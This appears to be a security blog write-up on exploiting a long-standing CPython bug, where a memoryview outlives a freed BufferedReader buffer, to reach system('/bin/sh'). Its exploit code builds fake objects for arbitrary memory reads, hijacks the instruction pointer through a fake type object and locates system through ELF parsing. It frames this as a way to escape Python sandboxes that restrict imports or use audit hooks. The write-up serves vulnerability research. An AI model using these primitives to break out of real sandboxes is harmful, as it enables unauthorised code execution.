<p>When the <code class="language-plaintext highlighter-rouge">BufferedReader</code> is initialized it <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L732">allocates</a> an internal buffer. When we read from the buffered reader (line 11) and the data doesn’t exist in its internal buffer, it will <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L1476">read</a> from the underlying stream. The read from the underlying stream happens via the <a href="https://docs.python.org/3/library/io.html#io.RawIOBase.readinto"><code class="language-plaintext highlighter-rouge">readinto</code></a> function, which receives a buffer as an argument, which the raw stream is supposed to read data into. The buffer passed as an argument is actually a <a href="https://docs.python.org/3/library/stdtypes.html#memoryview"><code class="language-plaintext highlighter-rouge">memoryview</code></a> which is <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L1467">backed by</a> the <code class="language-plaintext highlighter-rouge">BufferedReader</code>’s internal buffer. You can think of the <code class="language-plaintext highlighter-rouge">memoryview</code> as a pointer to, or a view of, the internal buffer.</p>
<p>Given that we control the underlying stream object, we can make the <code class="language-plaintext highlighter-rouge">readinto</code> function save a reference to this <code class="language-plaintext highlighter-rouge">memoryview</code> argument, which will persist even once we’ve returned from the function, which is exactly what the PoC does on line 6.</p>
<p>Once we have saved a reference to the <code class="language-plaintext highlighter-rouge">memoryview</code> we can delete the <code class="language-plaintext highlighter-rouge">BufferedReader</code> object. This will force the internal buffer to be <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L523">freed</a>, even though we still have a reference to our friendly <code class="language-plaintext highlighter-rouge">memoryview</code>, which is now pointing to a freed buffer.</p>
<h2 id="exploitation">Exploitation</h2>
<p>Now we have a memoryview pointing to freed heap memory, which we can read from or write to, where do we go from here?</p>
<p>The easiest approach for exploitation is to create a list with length equal to the length of the freed buffer, which will very likely have its item buffer (<code class="language-plaintext highlighter-rouge">ob_item</code>) allocated in the same place as the freed buffer. This will mean we get two different “views” on the same piece of memory. One view, the <code class="language-plaintext highlighter-rouge">memoryview</code>, thinks that the memory is just an array of bytes, which we can write to or read from arbitarily. The second view is the list we created, which thinks that the memory is a list of <code class="language-plaintext highlighter-rouge">PyObject</code> pointers. This means we can create fake <code class="language-plaintext highlighter-rouge">PyObject</code>s somewhere in memory, write their addresses into the list by writing to the <code class="language-plaintext highlighter-rouge">memoryview</code>, and then access them by indexing into the list.</p>
<p>In the case of the PoC, they write <code class="language-plaintext highlighter-rouge">0</code> to the buffer (line 16), and then access it with <code class="language-plaintext highlighter-rouge">print(L[0])</code>. <code class="language-plaintext highlighter-rouge">L[0]</code> gets the first <code class="language-plaintext highlighter-rouge">PyObject*</code> which is <code class="language-plaintext highlighter-rouge">0</code> and then <code class="language-plaintext highlighter-rouge">print</code> tries to access some fields on it, resulting in a null pointer dereference.</p>
<p>Given that this bug is present on every version of Python since at least Python 2.7, I wanted my exploit to work on as many versions of Python 3 as I could, just for fun. I decided against writing it for Python 2 because there are some differences in the languages which I didn’t want to account for in my exploit, but it’s absolutely possible to tweak my code to get this to work there. This meant that I couldn’t rely on any hardcoded offsets into the CPython binary, or into libc. Instead I chose to use known struct offsets (which haven’t changed between Python versions), some manual ELF parsing, and some known linker behaviour, to get a reliable exploit.</p>
<p>The goal of the exploit is to call <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code>. The steps of which are as follows:</p>
<ol>
<li>Leak CPython binary function pointer</li>
<li>Calculate the base address of CPython</li>
<li>Calculate the address of <code class="language-plaintext highlighter-rouge">system</code> or its PLT stub</li>
<li>Jump to this address with the first argument pointing to <code class="language-plaintext highlighter-rouge">/bin/sh</code></li>
<li>Win</li>
</ol>
<h3 id="getting-a-leak">Getting a leak</h3>
<p>Leaking arbitrary amounts of data from an arbitrary location turned out to be pretty easy. We can use a specially crafted <code class="language-plaintext highlighter-rouge">bytearray</code> object. The layout of a <code class="language-plaintext highlighter-rouge">bytearray</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">PyObject_VAR_HEAD</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_alloc</span><span class="p">;</span> <span class="cm">/* How many bytes allocated in ob_bytes */</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ob_bytes</span><span class="p">;</span> <span class="cm">/* Physical backing buffer */</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ob_start</span><span class="p">;</span> <span class="cm">/* Logical start inside ob_bytes */</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_exports</span><span class="p">;</span> <span class="cm">/* How many buffer exports */</span>
<span class="p">}</span> <span class="n">PyByteArrayObject</span><span class="p">;</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">ob_bytes</code> is a pointer to a heap-allocated buffer. When we read from or write to the bytearray, we’re reading/writing to this heap buffer. If we can craft a fake <code class="language-plaintext highlighter-rouge">bytearray</code> object, and we can set <code class="language-plaintext highlighter-rouge">ob_bytes</code> to point to an arbitrary address, then we can read or write to this arbitrary address by reading or writing to this <code class="language-plaintext highlighter-rouge">bytearray</code>.</p>
<p>Crafting fake objects is made very easy by CPython. If you create a <code class="language-plaintext highlighter-rouge">bytes</code> object (this is not the same thing as a <code class="language-plaintext highlighter-rouge">bytearray</code>), the raw data within the <code class="language-plaintext highlighter-rouge">bytes</code> object is always present 32 bytes after the start of the <code class="language-plaintext highlighter-rouge">PyBytesObject</code>, in one contiguous chunk. We can get the address of the <code class="language-plaintext highlighter-rouge">PyBytesObject</code> with the <code class="language-plaintext highlighter-rouge">id</code> function, and we know the offset to our data, so we can do something like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">fake</span> <span class="o">=</span> <span class="sa">b</span><span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span>
<span class="sa">b</span><span class="s">'AAAAAAAA'</span><span class="p">,</span> <span class="c1"># refcount
</span> <span class="sa">b</span><span class="s">'BBBBBBBB'</span><span class="p">,</span> <span class="c1"># type object pointer
</span> <span class="sa">b</span><span class="s">'CCCC'</span> <span class="c1"># other object data...
</span> <span class="p">])</span>
<span class="n">address_of_fake_object</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">fake</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>
</code></pre></div></div>
<p>Now <code class="language-plaintext highlighter-rouge">address_of_fake_object</code> will be the address of <code class="language-plaintext highlighter-rouge">AAAAAAAABBBBBBBBCCCC...</code>.</p>
<p>The final leak primative is shown below. Note that <code class="language-plaintext highlighter-rouge">self.freed_buffer</code> is the <code class="language-plaintext highlighter-rouge">memoryview</code> pointing to the freed heap buffer, and <code class="language-plaintext highlighter-rouge">self.fake_objs</code> is the list we created whose item buffer also points to the freed heap buffer.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">_create_fake_byte_array</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span>
<span class="n">byte_array_obj</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
<span class="n">p64</span><span class="p">(</span><span class="mi">10</span><span class="p">),</span> <span class="c1"># refcount
</span> <span class="n">p64</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="nb">bytearray</span><span class="p">)),</span> <span class="c1"># type obj
</span> <span class="n">p64</span><span class="p">(</span><span class="n">size</span><span class="p">),</span> <span class="c1"># ob_size
</span> <span class="n">p64</span><span class="p">(</span><span class="n">size</span><span class="p">),</span> <span class="c1"># ob_alloc
</span> <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">),</span> <span class="c1"># ob_bytes
</span> <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">),</span> <span class="c1"># ob_start
</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span> <span class="c1"># ob_exports
</span> <span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">byte_array_obj</span><span class="p">)</span> <span class="c1"># stop gc from freeing after we return
</span> <span class="bp">self</span><span class="p">.</span><span class="n">freed_buffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">byte_array_obj</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>
<span class="k">def</span> <span class="nf">leak</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span>
<span class="bp">self</span><span class="p">.</span><span class="n">_create_fake_byte_array</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">length</span><span class="p">)</span>
<span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">fake_objs</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">:</span><span class="n">length</span><span class="p">]</span>
</code></pre></div></div>
<h3 id="finding-the-base-of-cpython">Finding the base of cpython</h3>
<p>Now we have a leak primitive we can use it to find the base address of the binary. For this we need a function pointer into the binary. One object which hasn’t obviously changed in any version of Python 3, and has a function pointer into the CPython binary, is the <a href="https://github.com/python/cpython/blob/3.10/Objects/longobject.c#L5622"><code class="language-plaintext highlighter-rouge">PyLong_Type</code></a> object. I chose to use the <code class="language-plaintext highlighter-rouge">tp_dealloc</code> member, at offset 24, which points to the <code class="language-plaintext highlighter-rouge">type_dealloc</code> function at runtime, but I could have just as easily chose another pointer in the same object, or in another object entirely.</p>
<p style="text-align: center;"><img src="/assets/python-buffered-reader/int_type_obj.png" alt="The type object of an `int` object at runtime" width="500" /></p>
<p>Once we have a pointer into the binary, we can round it down to the nearest page and then walk backwards one page at a time until we find the ELF header. This works because we know that the binary will be mapped at a page aligned address.</p>
<p>All of this looks like:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_bin_base</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="c1"># Leak tp_dealloc pointer of PyLong_Type which points into the Python
</span> <span class="c1"># binary.
</span> <span class="n">leak</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="nb">int</span><span class="p">),</span> <span class="mi">32</span><span class="p">)</span>
<span class="n">cpython_binary_ptr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
<span class="n">addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">cpython_binary_ptr</span> <span class="o">>></span> <span class="mi">12</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">12</span> <span class="c1"># page align the address
</span> <span class="c1"># Work backwards in pages until we find the start of the binary
</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10000</span><span class="p">):</span>
<span class="n">nxt</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
<span class="k">if</span> <span class="n">nxt</span> <span class="o">==</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x7f</span><span class="s">ELF'</span><span class="p">:</span>
<span class="k">return</span> <span class="n">addr</span>
<span class="n">addr</span> <span class="o">-=</span> <span class="n">PAGE_SIZE</span>
<span class="k">return</span> <span class="bp">None</span>
</code></pre></div></div>
<h3 id="instruction-pointer-control">Instruction pointer control</h3>
<p>Recall that every <code class="language-plaintext highlighter-rouge">PyObject</code> has a pointer to its type object, e.g. a <code class="language-plaintext highlighter-rouge">PyLongObject</code> has a pointer to <code class="language-plaintext highlighter-rouge">PyLong_Type</code>, and a <code class="language-plaintext highlighter-rouge">PyListObject</code> has a pointer to <code class="language-plaintext highlighter-rouge">PyList_Type</code>. Every type object effectively functions as a vtable (amongst other things), which means there are lots of nice function pointers there. With this information its clear that if we can fake a <code class="language-plaintext highlighter-rouge">PyObject</code> and point it to a fake type object, and cause one of the vtable functions to be called, we can get control of the instruction pointer.</p>
<p>This is easy to set up with the aforementioned trick for creating fake objects, and we can trigger the <code class="language-plaintext highlighter-rouge">tp_getattro</code> function pointer by attempting to access a field on the fake object.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">set_rip</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">obj_refcount</span><span class="o">=</span><span class="mh">0x10</span><span class="p">):</span>
<span class="s">"""Set rip by using a fake object and associated type object."""</span>
<span class="c1"># Fake type object
</span> <span class="n">type_obj</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
<span class="n">p64</span><span class="p">(</span><span class="mh">0xac1dc0de</span><span class="p">),</span> <span class="c1"># refcount
</span> <span class="sa">b</span><span class="s">'X'</span><span class="o">*</span><span class="mh">0x68</span><span class="p">,</span> <span class="c1"># padding
</span> <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span><span class="o">*</span><span class="mi">100</span><span class="p">,</span> <span class="c1"># vtable funcs
</span> <span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">type_obj</span><span class="p">)</span>
<span class="c1"># Fake PyObject
</span> <span class="n">data</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
<span class="n">p64</span><span class="p">(</span><span class="n">obj_refcount</span><span class="p">),</span> <span class="c1"># refcount
</span> <span class="n">p64</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="n">type_obj</span><span class="p">)),</span> <span class="c1"># pointer to fake type object
</span> <span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="c1"># The bytes data starts at offset 32 in the object
</span> <span class="bp">self</span><span class="p">.</span><span class="n">freed_buffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># Now we trigger it. This calls tp_getattro on our fake type object
</span> <span class="bp">self</span><span class="p">.</span><span class="n">fake_objs</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">trigger</span>
<span class="k">except</span><span class="p">:</span>
<span class="c1"># Avoid messy error output when we exit our shell
</span> <span class="k">pass</span>
</code></pre></div></div>
<p>I provide a way to set the refcount of the fake object because when calling a function from the vtable, the first argument to the function is a pointer to the object itself, and if the vtable function is actually <code class="language-plaintext highlighter-rouge">system</code>, then the the first bytes of the object are going to be interpreted as the command to execute. Therefore when creating the fake object for calling <code class="language-plaintext highlighter-rouge">system</code>, we can set the refcount to <code class="language-plaintext highlighter-rouge">/bin/sh\x00</code>.</p>
<h3 id="locating-system">Locating system</h3>
<p>All versions of Python import <code class="language-plaintext highlighter-rouge">system</code> from libc. So, assuming Python is dynamically linked, we know that there’ll be an entry in the PLT for <code class="language-plaintext highlighter-rouge">system</code>, we just need to work out the address of this entry to be able to call it. Fortunately we can work this out through some parsing of the ELF structures.</p>
<p>The steps to do this are as follows:</p>
<ul>
<li>Use our arbitrary leak to leak the ELF headers</li>
<li>Parse the <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header">program headers</a> looking for the header of type <code class="language-plaintext highlighter-rouge">PT_DYNAMIC</code>. This will give us the address of the <code class="language-plaintext highlighter-rouge">.dynamic</code> section</li>
<li>Parse the <code class="language-plaintext highlighter-rouge">.dynamic</code> section, extracting the <code class="language-plaintext highlighter-rouge">DT_JMPREL</code>, <code class="language-plaintext highlighter-rouge">DT_SYMTAB</code>, <code class="language-plaintext highlighter-rouge">DT_STRTAB</code>, <code class="language-plaintext highlighter-rouge">DT_PLTGOT</code> and <code class="language-plaintext highlighter-rouge">DT_INIT</code> values, which give us the addresses of the various structures we need</li>
<li>Walk the relocation table, for each item get the offset into the symbol table, and use that to get the offset into the string table which gives the corresponding function name</li>
<li>Keep walking the relocation table until we find the entry corresponding to <code class="language-plaintext highlighter-rouge">system</code>.</li>
</ul>
<p>The key piece of information that we want to know from this is the index in the relocation table of the <code class="language-plaintext highlighter-rouge">system</code> symbol. The linker is kind enough to place GOT and PLT entries in the same order as they exist in the relocation table, which means that once we have the index of the <code class="language-plaintext highlighter-rouge">system</code> entry we can work out its address in the GOT and the address of its PLT stub.</p>
<h4 id="full-relro">Full RELRO</h4>
<p>If the binary is full RELRO then we know that all of the function addresses have already been resolved, this means that we can just read the <code class="language-plaintext highlighter-rouge">system</code> address from the GOT using our arbitary leak.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">system_addr</span> <span class="o">=</span> <span class="n">got_address</span> <span class="o">+</span> <span class="n">system_idx</span><span class="o">*</span><span class="mi">8</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">got_address</code> conveniently comes from the <code class="language-plaintext highlighter-rouge">DT_PLTGOT</code> entry in the <code class="language-plaintext highlighter-rouge">.dynamic</code> section, and <code class="language-plaintext highlighter-rouge">system_idx</code> is what we just worked out by walking the relocation table.</p>
<p>We can determine whether the binary is full RELRO or not by reading the 2nd and 3rd entries in the GOT, which would normally be the address of the linkmap and <code class="language-plaintext highlighter-rouge">dl_runtime_resolve</code>, respectively. If they are both <code class="language-plaintext highlighter-rouge">0</code> then we can assume the binary is full RELRO, because the loader doesn’t waste its time setting up the resolution pointers/code in the PLT if nothing needs resolving at runtime.</p>
<h4 id="partial--no-relro">Partial / No RELRO</h4>
<p>If the binary is partial or no RELRO then the address of <code class="language-plaintext highlighter-rouge">system</code> needs to be resolved at runtime. For us this just means we will jump to the relevant PLT stub which will do the resolution and then call the function, instead of reading the function address from the GOT and calling it ourselves.</p>
<p>We can work out the address of the PLT stub like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">system_plt</span> <span class="o">=</span> <span class="n">plt_address</span> <span class="o">+</span> <span class="n">system_idx</span><span class="o">*</span><span class="n">SIZEOF_PLT_STUB</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">SIZEOF_PLT_STUB</code> is always 16 bytes, which means the only remaining unknown in this equation is the PLT address. As far as I could tell there’s no structure in an ELF which stores the address of this, which means we have to use some trickery to find it. Fortunately all of the linkers I encountered always place the PLT directly after the <code class="language-plaintext highlighter-rouge">.init</code> section, the address of which we know from the <code class="language-plaintext highlighter-rouge">DT_INIT</code> entry in the <code class="language-plaintext highlighter-rouge">.dynamic</code> section. We also know that on x86-64 the first instruction in the PLT is always of the form <code class="language-plaintext highlighter-rouge">push qword ptr [rip + offset]</code>, the opcode for which is <code class="language-plaintext highlighter-rouge">ff35</code>. So we can search past the end of the <code class="language-plaintext highlighter-rouge">.init</code> section for the <code class="language-plaintext highlighter-rouge">ff35</code> bytes, and wherever we find them is presumably the start of the PLT.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">init_data</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="n">init</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span>
<span class="n">plt_offset</span> <span class="o">=</span> <span class="bp">None</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">init_data</span><span class="p">),</span> <span class="mi">2</span><span class="p">):</span>
<span class="k">if</span> <span class="n">init_data</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="sa">b</span><span class="s">'</span><span class="se">\xff\x35</span><span class="s">'</span><span class="p">:</span> <span class="c1"># push [rip+offset]
</span> <span class="n">plt_offset</span> <span class="o">=</span> <span class="n">i</span>
<span class="k">break</span>
</code></pre></div></div>
<p>If you want to follow along with the specifics of the parsing then I suggest reading the ELF <a href="https://man7.org/linux/man-pages/man5/elf.5.html">man page</a> and <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">Wikipedia</a> article, which have more information on the structures involved.</p>
<h3 id="finished-product">Finished Product</h3>
<p>Putting all of these pieces together gives us a 100% reliable exploit which works in every version of Python 3 on x86-64 Ubuntu, even with PIE, full RELRO, and CET enabled, and it requires no imports. Trying it out on Ubuntu 22.04 gives:</p>
<p style="text-align: center;"><img src="/assets/python-buffered-reader/final.png" alt="Exploit on Ubuntu 22.04" width="500" /></p>
<p>You can find the full source of the exploit on my GitHub - <a href="https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py">https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py</a>.</p>
<h2 id="so-what">So what?</h2>
<p>What’s the point of this whole thing, can’t you just do <code class="language-plaintext highlighter-rouge">os.system(...)</code>? Well, yes.</p>
<p>Given that you need to be able to execute arbitary Python code in the first place, this exploit won’t be useful in most settings. However, it may be useful in Python interpreters which are attempting to sandbox your code, through restricting imports or use of <a href="https://peps.python.org/pep-0578/">Audit Hooks</a>, for example. This exploit doesn’t use any imports and doesn’t create any code objects, which will fire <code class="language-plaintext highlighter-rouge">import</code> and <code class="language-plaintext highlighter-rouge">code.__new__</code> hooks, respectively. My exploit will only trigger a <code class="language-plaintext highlighter-rouge">builtin.__id__</code> hook event, which is much more likely to be permitted.</p>A while ago I was browsing the Python bug tracker, and I stumbled upon this bug - “memoryview to freed memory can cause segfault”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.